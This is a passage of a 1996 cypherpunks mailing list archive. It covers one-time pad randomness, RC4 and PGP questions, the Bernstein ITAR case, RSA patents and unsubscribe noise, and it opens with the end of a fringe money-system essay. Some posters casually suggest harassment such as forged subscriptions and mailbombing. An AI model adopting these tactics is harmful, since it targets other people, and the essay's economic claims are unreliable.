service charge and abolishing the interest charge. The hardware 
solution is time(t) = 0 by installing an instantaneous electronic 
cashless marketplace. 
 
GAME MODEL: SERVICE CHARGE VS. INTEREST
     In his book `The Theory of Games and Economic Behavior', 
John Von Neumann, one of this century's top mathematicians, 
stated that "important questions in economics arise in a more 
elementary fashion in the theory of games." In the business war 
for markets, the economy decides who sells their goods and who 
fails to. Models used by economists are flawed by guesses and 
approximations about what the economy will choose. The only way 
to perfectly model the economy is to use fair chance to pick the 
winners and losers.
 
TO PLAY MORT-GAGE:
     The necessary game equipment for "mort-gage" is 1) a box to 
represent the market economy); 2) 3 types of tokens to represent 
food, shelter, and energy (the tokens can be mints, napkins, 
cutlery);  3) a fair chance mechanism like a coin, cards, dice, 
straws, etc.; 4) matches or tokens to represent currency.
     In the Interest Game, all owe the bank 11 for every 10 
tokens they borrow and have to inflate their prices to repay both 
the principal and the interest.
     Step 1) Have all the players wishing to get into business 
pledge their watches to borrow 10 matches from the bank at an 
interest rate. 
     Step 2) Have all players spend 10 matches into the market 
box in exchange for a token representing the product of the 
economy's labor.
     Step 3) Have pairs of players, those with similar tokens 
first, use chance to decide which will win a market share out of 
the box large enough to pay the principal and the interest 
necessary to survive the bank's demand.
     Step 4) When the market runs out of currency, let the bank 
seize the tokens and watches of the losers. 
     Step 5) Record the percent of those knocked into 
unemployment and the collateral seized.
 
     In the Service Charge Game, all owe 11 for every 11 they 
borrow with the 11th paid immediately to the bank employees as a 
service charge.
     Step 1) Have all the players wishing to get into business 
pledge their watches to borrow 11 matches from the bank. 
     Step 2) Have all players spend 11 matches into the market 
box in exchange for a product token, 10 for the services of those 
who produce the goods like on Interest Island, but also 1 for the 
services of the bank employees who facilitated the transactions.
     Follow Step 3), 4) and 5) and note that in the Service 
Charge Game, unlike in the Interest Game, everybody can sell all 
their goods because the 11th unit of money entered the market 
through the bank employees. The very subtle difference between 
systems is that in the Interest Game, the bank demands payment of 
money it did not create while in the Service Charge Game, the 
bank demands payment of money it did create. With exactly enough 
markets to match the prices of goods produced, there can be no 
foreclosures.
     I hope this analysis has helped clear up many of the formerly 
misrepresented and misunderstood aspects of the usury banking system 
as well as explain why usury has been condemned throughout history as 
the greatest crime against humanity. It's the only thing standing 
between mankind and abundant salvation.
     I welcome any questions on any aspects of how the banking systems 
engineering. 
 
--
John C. "The Engineer" Turmel, Leader, Abolitionist Party of Canada,
2918 Baseline Rd., Nepean, ON, K2H 7B7, Canada,Tel/Fax: 613-820-8656
     All TURMEL topics cross-posted to newsgroup: can.politics


--
=-GRAHAM-JOHN BULLERS=-=AB756@FREENET.TORONTO.ON.CA=-=ALT.2600.MODERATED-=
Lord grant me the serenity to accept the things I cannot change.The courage
to change the things I can.And the wisdom to hide the bodies of the people
=-=-=-=-=-=-=-=-=I had to kill because they pissed me off=-=-=-=-=-=-=-=-=-=




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 17 Apr 1996 19:15:20 +0800
To: perry@piermont.com
Subject: Re: why compression doesn't perfectly even out entropy
Message-ID: <ad998fe00b021004eaf9@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:34 PM 4/16/96, Perry E. Metzger wrote:

>True enough, but the claim was that a random string has no
>representation which is smaller than itself.

If by "the claim" you mean what I said, as I presume from context you do,
then this is a serious misstatement of what I said.

I already have elaborated on this, so I won't again here.




Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moltar Ramone <jlasser@rwd.goucher.edu>
Date: Wed, 17 Apr 1996 17:16:08 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: [NOISE] Is this getting through?
Message-ID: <Pine.SUN.3.91.960416184409.20974B-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


I seem to have stopped getting CP mail... is there a problem with the 
list, or is it just my machine?

(Right now, it's 4/16 at 7:00pm; reply accordingly)
Jon
----------
Jon Lasser (410)494-3072                         - Obscenity  is a crutch  for
jlasser@rwd.goucher.edu                            inarticulate motherfuckers.
http://www.goucher.edu/~jlasser/
Finger for PGP key (1024/EC001E4D)               - Fuck the CDA.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Wed, 17 Apr 1996 18:52:38 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Decision in ITAR challenge case
Message-ID: <Pine.SUN.3.91.960416192153.28185E-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


I understand from an AP reporter that the judge in the Bernstein
challenge to the ITAR refuesed the motion to dismiss and -- if the
reporter is correct -- held that source code is First amendment speech.
This appears to conflict with the Karn decision that dismissed a somewhat
similar challenge to the ITAR on political question grounds.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Charles Graves <llurch@networking.stanford.edu>
Date: Wed, 17 Apr 1996 16:20:08 +0800
To: cypherpunks@toad.com
Subject: [Non-Bell Yadda Yadda Yadda] Re: Money supply is fake anyway
Message-ID: <199604170228.TAA26008@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Those interested in this topic will be pleased to know that a solution is in
the works, in the form of Russell Gregory Thatcher's campaign for the US
Presidency. http://www.alaska.net/~schoedel/thatcher/proposal.html

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cmca@alpha.c2.org (Chris McAuliffe)
Date: Wed, 17 Apr 1996 16:50:11 +0800
To: perry@piermont.com
Subject: Re: on corporations and subpoenas
In-Reply-To: <199604162215.SAA00208@jekyll.piermont.com>
Message-ID: <199604170234.TAA10971@eternity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[To: perry@piermont.com]
[cc: "Adam Pingitore" <Adam_Pingitore@alli.wnyric.org>,]
    cypherpunks@toad.com
[Subject: Re: on corporations and subpoenas ]
[In-reply-to: Your message of Tue, 16 Apr 96 18:15:06 D.]
             <199604162215.SAA00208@jekyll.piermont.com> 

Perry intoned:
>"Adam Pingitore" writes:
>>           GET ME OFF THE DAMN LIST
>I will never take you off. You might as well give up asking me now. I
>have no intention of doing anything for you. You can rot so far as I'm
>concerned.

1. Is that rot with a key of 13? (ObCrypto)

2. More importantly, has anyone seen the "clueless" mailing list
recently? This is the one where you forge subscriptions for other
people, (who need to be qualified first, refer to the name of the
mailing list) then send it obvious trolls and watch it go
super-critical. Endless hours of fun.

Chris McAuliffe <cmca@alpha.c2.org> (No, not that one.)

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBMXRRDIHskC9sh/+lAQHR5wP9G/uAwitozfQ2Zlc4EXRfuAMxhF14ouyn
9S/nRYPiBiGOOUJRDWMGsMNUfLg+a3pqeg6m1poI2fGomIrJDvbw8cupJq75XVUo
eosjY0vMZXSeX2Ck+3c+Use/hyDZQ2AdsMTns4KMsWF3kuHDKqrwAhMBdepkhbWh
TYPqps8v8GU=
=io4U
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Keith A. Glass" <salgak@dcez.com>
Date: Wed, 17 Apr 1996 22:03:15 +0800
Subject: The Electronic Freedom March needs YOUR Help !!!
Message-ID: <31742F90.4D2F@dcez.com>
MIME-Version: 1.0
Content-Type: text/plain


Friends of Free Speech on the Net:

On June 30th, 1996, a large anti-CDA rally, the Electronic Freedom March, is 
planned for the Ellipse, in front of the White House.  But without your help,
it won't happen.

We need volunteers to help us plan the EFM and the logistics required for it, 
people to help us raise funds to pay the expenses (the Park Service has 
required us to provide 80 porta-potties, at a cost of nearly $4500.00 alone, 
and that's not our only requirement. . .), and people to help us run the 
March on June 30th.   Not to mention publicity, etc.

We need your help.  **I** need your help.  I've posted this to the DC area 
groups, as well as to a few groups that I feel might be useful in gathering 
more volunteers and interested people.  But I need your committment to help 
NOW, or we won't be able to run the EFM, or as it's been called, the "Million 
Geek March".  Come on, out there: help us out !!!

-- 
*   Keith A. Glass,  Annandale, Virginia, USA, Filker/punster at large    *
*           Washington Coordinator, Electronic Freedom March              *
*        30 June 1996, Washington DC   URL: http://www.efm.org            *
*  Note: the following line is an intentional act of Civil Disobedience:  *
*  FUCK THE TELECOMMUNICATIONS DECENCY ACT--DEFEND THE FIRST AMENDMENT !  *




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mathew Ellman <mellman@niia.net>
Date: Wed, 17 Apr 1996 16:51:31 +0800
To: cypherpunks@toad.com
Subject: i want off
Message-ID: <199604170041.TAA18169@silver.niia.net>
MIME-Version: 1.0
Content-Type: text/plain


can someone help me off this mailing list
Mathew Ellman
(DEAL WITH IT)
15 N WASHINGTON ST APT 1
VALPARAISO IN 46383

HAVE A VERY GREAT DAY FROM ME TO YOU.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 17 Apr 1996 23:23:37 +0800
To: rick hoselton <hoz@univel.telescan.com>
Subject: Re: why compression doesn't perfectly even out entropy
In-Reply-To: <199604162331.TAA22836@linet02.li.net>
Message-ID: <199604170012.UAA00724@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



rick hoselton writes:
> At 05:34 PM 4/16/96 -0400, Perry E. Metzger wrote:
> 
> >> ...it is possible ... for Hamlet to appear out of a random number generato
r,
> 
> >> But even if it came from a completely random source, it would 
> >> still make a bad one-time pad.
> 
> >No it wouldn't. 
> 
> Are you sure you want to claim that the text of Hamlet would make 
> a good key for a one-time pad?

If the text of Hamlet were produced by a truly random number
generator, then it would make a fine one time pad. A cryptanalyst
seeing patterns in it would have no way of knowing that the patterns
were caused by the input being "Hamlet" -- he would have no way to
demonstrate that just because the first five hundred words of the key
appear to have been "Hamlet" that the rest would be -- and indeed,
there would be far more cases where the rest wouldn't be. If, on the
other hand, what you are doing is using books as keys for ciphers,
then "Hamlet" is a very poor one.

> >There is a tiny but nonzero probability that xoring
> >your one time pad with your text will result in a cyphertext equal to,
> >say, the Bible. Big deal. 
> 
> Most unusual, and you're right, its inconsequential.  But if you use the 
> text of Hamlet or the text of the Bible for your KEY to a one-time-pad,
> you're very likely to get broken.

IF you are using a one time pad system that truly has a random source
of keying material, AND the 1 in 2^1460536 event of the key being
Hamlet occurred, THEN no, you aren't likely to get broken. Note that
the probability of having this happen is astronomically low, but then
again, the probability of ANY given one time pad being generated is
astronomically low. If you are just picking books off the shelf and
playing one time pad with them, yes, you are correct, you will likely
be broken.

> >If the key is really random, the
> >cryptanalyst has no way to tell what the underlying text was.
> 
> But that silly cryptanalyst might not know that you got Hamlet from 
> your random number generator.  He might think you copied it out of a 
> book!  Then, Hamlet stops being a random number.  The context changes.

I don't think you are considering this clearly.

It is far, far more probable for the cryptanalyst, thinking the
key was "Hamlet", to get out a plausible but totally bogus text, than
it is for the key to actually be "Hamlet". Of course, it is also far,
far more probable for you to be stupid than for a random number
generator to put out "Hamlet", but if you go around getting rid of
RNGs that produce "Hamlet" or anything close, you have in theory given
information to the attacker that gives them a slightly better chance
of attacking you since your pads are no longer purely random.

The reason all this isn't stupid to discuss and actually has some
importance is just this fact. If you build a system that discards
things that "don't look like they have enough entropy" (which certain
people around here have proposed), you are giving the cryptanalyst a
very strong piece of information about the key, so your key is no
longer totally unpredictable. An irony, but something important to
keep in mind. Every once in a while (once in every four billion bits,
or so) your random number generator will put out 32 1's in a row if it
is functioning properly. Any given small segment of the output of a
good RNG might not look "random", but "random" isn't a property of a
given number -- it is the property of the infinite sequence itself.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 17 Apr 1996 18:08:31 +0800
To: ssalgaller@CCGATE.HAC.COM
Subject: Re: Re[2]: What's the "Human Interaction Institute" at CMU For ???
In-Reply-To: <9603168296.AA829695327@CCGATE.HAC.COM>
Message-ID: <199604170019.UAA00756@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



ssalgaller@CCGATE.HAC.COM writes:
>           Am I the only one worrying about the use of technology to
>           implement a "New World Order" ???

Yes. The rest of us are all part of the attempt to create such a world
order, and thus aren't worried about it because we will be in control
of the puny little lives of people such as yourself.

>           A similar concern could be made about biotechnology: with
>           gene splicing, it would be possible to create a race of "sub
>           humans" to do slave labor and fight wars.

Even now, my armies of genetic slaves are out there searching for
human blood...

Vlad "Genex" Metzger




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 17 Apr 1996 21:10:42 +0800
To: cypherpunks@toad.com
Subject: That All.net loon...
Message-ID: <Pine.ULT.3.92.960416202041.26011B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Think of this as an interesting experiment in reputation building, where
the bad guys won, and got a lot of business from the ignorant.

Remember Fred Cohen, the lunatic who had his telnet port booby-trapped to
fire off complaints to root and postmaster?

 http://www.atria.com/People/dawson/tbtf/archive/04-14-96.html
 http://www.dhp.com/amusement.html
 http://all.net/journal/netsec/top.html
 http://all.net/journal/netsec/9603.html
 http://all.net/journal/netsec/9604.html

I feel so sorry for Keith. He was trolled in a big way.

I also found this AMAZING BREAKTHROUGH in preventing IP spoofing very
amusing:

 http://all.net/journal/netsec/9606.html

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 17 Apr 1996 19:15:18 +0800
To: ab756@freenet.toronto.on.ca
Subject: Re: MORE ON MONEY
In-Reply-To: <m0u9JDK-0000hpC@queen.torfree.net>
Message-ID: <199604170145.VAA00926@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Graham Bullers writes:
> 
> 
>     TURMEL:      Mathematics of how Interest works
> 
> 
>            GREENDOLLAR AND TIMEDOLLAR LETSYSTEM ENGINEERING

Exquisitely badly written and conceived of bullshit.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 17 Apr 1996 19:35:38 +0800
To: ssalgaller@CCGATE.HAC.COM
Subject: Re: What's the "Human Interaction Institute" at CMU For ???
In-Reply-To: <9603168296.AA829695326@CCGATE.HAC.COM>
Message-ID: <Pine.SOL.3.91.960416220537.2629B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


ER... one other possibilty could be Computer/Human Interaction (CHI), 
which is what he's published in before. Your buttocks are quite safe

Simon


---
They say in  online country             So which side are you on boys
There is no middle way                  Which side are you on
You'll either be a Usenet man           Which side are you on boys
Or a thug for the CDA                   Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net
Date: Wed, 17 Apr 1996 19:54:43 +0800
To: cypherpunks@toad.com
Subject: Re: Article on PGP flaws
Message-ID: <9604170333.AB17685@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain



            David Lesher <wb8foz@nrk.com>
  Says if 
> someone gets your randseed.bin they can infer the PRNG output sequence 
> and your IDEA key.  Doesn't develop in any detail.  Says the IDEA key 
> should be chosen from _truly_ random numbers.

I fed the result of 
pgp +makerandom=2000 rnd.pgp 
into noisesphere.exe 

Every times, it gives a distribution that looks like a zebra from the 
top view.  Any comments?

JFA




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 17 Apr 1996 19:47:24 +0800
To: Alex Strasheim <cp@proust.suba.com>
Subject: Re: Bidzos Holds Key / A hacker's paradise
In-Reply-To: <199604162318.SAA01218@proust.suba.com>
Message-ID: <199604170230.WAA00997@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Alex Strasheim writes:
> Can whoever ends up with the rsa patent pull rsaref off the market, and
> retroactively make software that uses it illegal?

No.

> Or would they just be able to prevent people from writing new code
> with rsaref?

No, they couldn't do that either.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moltar Ramone <jlasser@rwd.goucher.edu>
Date: Wed, 17 Apr 1996 19:11:39 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: [NOISE] Desubscribed (Was Re: [NOISE] Is this getting through?)
In-Reply-To: <ad99af8a0d0210045bd1@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.960416230153.18663A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 16 Apr 1996, Timothy C. May wrote:

> At 10:45 PM 4/16/96, Moltar Ramone wrote:
> >I seem to have stopped getting CP mail... is there a problem with the
> >list, or is it just my machine?
[ ... ]
> You didn't say over what interval the mail has stopped for you, so this may
> not help.

It helped; thank you. It was several days before I figured out which list 
I was not receiving mail from :-)

I'm forwarding this to the list because I would like to note that, after 
checking with majordomo (which I _should_ have done beforehand, but 
didn't think to) that I was unsubscribed from the list.

I didn't ask to be unsubscribed from the list; if (which I doubt) the 
user list was restored from a backup, I would almost certainly have been 
on it, as I've been on the list for a while now.

This leads me to believe that somebody else unsubscribed me. *sigh* Is 
there any way to find out for certain (ie does the majordomo@toad.com 
keep logs)?

Jon Lasser
----------
Jon Lasser (410)494-3072                         - Obscenity  is a crutch  for
jlasser@rwd.goucher.edu                            inarticulate motherfuckers.
http://www.goucher.edu/~jlasser/
Finger for PGP key (1024/EC001E4D)               - Fuck the CDA.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Wed, 17 Apr 1996 18:52:23 +0800
To: cypherpunks@toad.com
Subject: Re: (mailbomb request)
Message-ID: <2.2.32.19960416145355.006a094c@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


At 05:08 PM 04/16/96 -0800, bharper@customcpu.com (Harper, Bill) wrote:
>I am very  interested in cryptography and all related subjects but I cannot
>find enough info about it, and am wondering if anyone can please email me
>anything you know and the basics. Thanks!  
>

Is this begging for mailbombs, or what?

Let's see, we could email him the plain-ascii version of the cyphernomicon
(no zipping allowed :-), for starters.....

Dave Merriman
 
-------------------------------------------------------------
"Giving money and power to government is like giving 
whiskey and car keys to teenage boys."
                    P. J. O'Rourke (b. 1947), U.S. journalist.
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
http://www.shellback.com/personal/merriman/index.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 17 Apr 1996 18:56:54 +0800
To: cypherpunks@toad.com>
Subject: Re: [IRS] Elvis in Escrow
Message-ID: <v02120d7ead9a4b576a52@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 15:56 4/16/96, Bill Frantz wrote:

>I wonder, how much is NSA's secret key worth?  You know, the one they use
>to grab the extra key bits that Lotus Notes sends them.

Probably a lot more that your tax return. The IRS leaking confidential
information is one thing. The NSA losing secret keys quite another.


Disclaimer: My opinions are my own, not those of my employer, DigiCash, Inc.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 17 Apr 1996 19:13:43 +0800
To: jr@Samba.cnb.uam.es
Subject: Re: rc4 speeds
Message-ID: <199604170744.AAA28455@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>>That 164 mb/sec figure for RC4's speed better be a typo, because I
>>can't even come close to that.  I wrote an Assembler subroutine that 
>>encrypts a 32,768 byte block, and called it 65536 times on a 
>>486/DX2-66, without doing any disk reads or writes.

First of all, is that megabytes, or megabits?  I've forgotten how
many instructions it takes to do RC4, but RC5 takes 8-10 per round per
pair of words encrypted, so it should do about 1/2 bit per instruction for
16-round.
Some processors can do more than one instruction per clock cycle,
though loads and stores are usually a bit slower.  But you only need to
load two words every 128-160 clocks, which is easy on a pipelined machine.
So maybe it's a typo, but it should be far faster than 164 kB/s.

#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fulano@usa.pipeline.com (German E. Hayles)
Date: Wed, 17 Apr 1996 19:47:08 +0800
To: Linda Talisman <tali9750@SPARKY.CS.NYU.EDU>
Subject: Re: UNSUVSCRIVE Broken - Film last week (fwd)
Message-ID: <199604170158.BAA24263@pipe14.h1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Mean?  Heck  I'm taking notes. 
 
 Good to here from you 
 
   {{{{{{{ --<-<-@ }}}}}}}}} 
 
    
-- 
 
German E. Hayles




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 17 Apr 1996 20:02:35 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: "STOP SENDING ME THIS SHIT"
In-Reply-To: <ad99852e0a02100467c6@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.960417042451.14115A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 16 Apr 1996, Timothy C. May wrote:

> At 12:12 PM 4/16/96, Adam Pingitore wrote:
> >          STOP SENDING ME THIS SHIT
> 
> 
> As this is one of several such messages this clown has sent us, despite
> unsubscribe instructions having been posted several times in the last few
> weeks, I am bouncing all of his inappropriate messages back to him (though
> I am being careful--and I urge you all to be careful, too--to cut out any
> cc:ing of others).
> 
> If you feel this jerk's posts are inappropriate, you might decide to do the
> same as I am doing.
> 
> (Again, be careful to review the To: and cc: fields before sending, to
> ensure that the list does not get spammed by your actions.)

I think the "clueless" mailing list is a must at this point.


> 
> --Tim May
> 
> Boycott "Big Brother Inside" software!
> We got computers, we're tapping phone lines, we know that that ain't allowed.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Higher Power: 2^756839 - 1  | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."
> 
> 
> 
> 
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Holovacs <holovacs@styx.ios.com>
Date: Wed, 17 Apr 1996 22:17:23 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: math patents
In-Reply-To: <m0u8Ysr-0008yhC@pacifier.com>
Message-ID: <Pine.3.89.9604150603.A29831-0100000@styx.ios.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 14 Apr 1996, jim bell wrote:

> . . .  However, I  don't see the 
> basis for patenting what is just about pure mathematics, and RSA is very 
> close to pure math.  The fact that there is a practical use for it is 
> almost  a secondary consideration.   
...
> Had mathematics always been patentable, the patent on that math would have 
> expired at least decades, and possibly centuries ago.
> 
> In any case, I don't think it's unrealistic to suspect that the government 
> was playing games with the patent system due to RSA. 
> That's right, the patent system was actuallly 
> denying the public this system.
> 

This falls into the same category as software patents. According to an ATT
patent attorney, the ALGORITHM is not patented, however building a virtual
machine to implement it is covered by the patent. This is the same as
chemical processes which have been patented historically, you use public
domain chemicals, and normal laboratory procedures in appropriate
sequence, apply an algorithm to create something new. The patent covers
use of this process (algorithm). As such it is not new. 

Crypto is a very TINY part of the picture. General software patents 
(where the big money is) had been submitted for years, and these 
financial considerations apparently drove the picture.

Not that this makes much sense, but then the whole concept of 
intellectual property law is littered with absurdities.

> 


-----------------------------------------------------------------------
Jay Holovacs <holovacs@ios.com>
-----------------------------------------------------------------------
PGP Key fingerprint =  AC 29 C8 7A E4 2D 07 27  AE CA 99 4A F6 59 87 90 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Holovacs <holovacs@styx.ios.com>
Date: Wed, 17 Apr 1996 22:29:42 +0800
To: Moltar Ramone <jlasser@rwd.goucher.edu>
Subject: Re: [NOISE] Is this getting through?
In-Reply-To: <Pine.SUN.3.91.960416184409.20974B-100000@rwd.goucher.edu>
Message-ID: <Pine.3.89.9604170627.A4609-0100000@styx.ios.com>
MIME-Version: 1.0
Content-Type: text/plain


Obviously your mail is going to Adam Pingitore...

-----------------------------------------------------------------------
Jay Holovacs <holovacs@ios.com>
-----------------------------------------------------------------------
PGP Key fingerprint =  AC 29 C8 7A E4 2D 07 27  AE CA 99 4A F6 59 87 90 

On Tue, 16 Apr 1996, Moltar Ramone wrote:

> I seem to have stopped getting CP mail... is there a problem with the 
> list, or is it just my machine?
> 
> (Right now, it's 4/16 at 7:00pm; reply accordingly)
> Jon
> ----------
> Jon Lasser (410)494-3072                         - Obscenity  is a crutch  for
> jlasser@rwd.goucher.edu                            inarticulate motherfuckers.
> http://www.goucher.edu/~jlasser/
> Finger for PGP key (1024/EC001E4D)               - Fuck the CDA.
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 17 Apr 1996 22:13:03 +0800
To: cypherpunks@toad.com
Subject: Knowledge of TCP/IP
Message-ID: <2.2.32.19960417103657.00cd100c@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:56 PM 4/16/96 -0400, Noel Yap wrote:
>Knowledge about TCP/IP is alot easier to control than knowledge about the
Berlin Wall (ie, how many Chinese will even know of the existence of TCP/IP
-- in the US, where this is freely available, how many citizens know of it's
existence)?
>

Applications software distributed commercially or on a "free" basis allows
people who know nothing about TCP/IP or C++ or Visual Basic to use all of
these things to get work done.  They need not understand completely what
they are doing.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 17 Apr 1996 22:29:40 +0800
To: bharper@customcpu.com (Harper, Bill)
Subject: No Subject
In-Reply-To: <19960417010838988.AAA157@[198.70.210.125]>
Message-ID: <199604171117.HAA05051@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Harper, Bill writes:
> I am very  interested in cryptography and all related subjects but I cannot
> find enough info about it, and am wondering if anyone can please email me
> anything you know and the basics. Thanks!  

Read the book "Applied Cryptography" by Bruce Schneier. It is unfair
to expect people to spend lots of time personally tutoring you when
there are good books available and the subject is large.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 17 Apr 1996 22:33:51 +0800
To: Mathew Ellman <mellman@niia.net>
Subject: Re: i want off
In-Reply-To: <199604170041.TAA18169@silver.niia.net>
Message-ID: <199604171119.HAA05067@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Mathew Ellman writes:
> can someone help me off this mailing list
> Mathew Ellman
> (DEAL WITH IT)
> 15 N WASHINGTON ST APT 1
> VALPARAISO IN 46383
> 
> HAVE A VERY GREAT DAY FROM ME TO YOU.

Try the same address you used to get on. The people reading the list
are not the same as the people who run the list. There is NEVER a
reason to send mail to a list to try to unsubscribe.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Wed, 17 Apr 1996 23:23:59 +0800
To: ssalgaller@CCGATE.HAC.COM
Subject: [NOISE] was Re: Re[2]: What's the "Human Interaction Institute" at CMU For ???
In-Reply-To: <9603168296.AA829695327@CCGATE.HAC.COM>
Message-ID: <Pine.BSF.3.91.960417073447.4979A-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 16 Apr 1996 ssalgaller@CCGATE.HAC.COM wrote:

>           Dear Concerned Citizen,
> 
>           Am I the only one worrying about the use of technology to
>           implement a "New World Order" ???
> 
No. Check this out. Very scary stuff. These people are too wierd:

Send e-mail addressed to listproc@internex.net with "Dilbert" as the 
subject and the words
"subscribe Dilbert_List Joe Blow" in the body of the message (be sure to 
replace the words
"Joe Blow" with your name!). Don't include any other information (your 
e-mail address will be picked up
automatically). NOTE: To unsubscribe, follow these same steps but use 
"unsubscribe
Dilbert_List" in the body of the message. 


>           If not, where else can I post this message ???
> 
>           Yes, AOL has a movie trivia board, but I'm serious !
> 
Nothing serious over at ol' AOL.

>           A similar concern could be made about biotechnology: with
>           gene splicing, it would be possible to create a race of "sub
>           humans" to do slave labor and fight wars.
>
Been done. These are called Induhviduals.
 
>           This has been done in several Sci-Fi movies, but it's not
>           going to stay fiction much longer.
>
A certain author, who shall remain nameless, seems to imply that such 
dastardly creatures can be found at PacBell.

 
>           Stephen S.
> 
>           PS: Shouldn't these be the questions that CMU worries about?
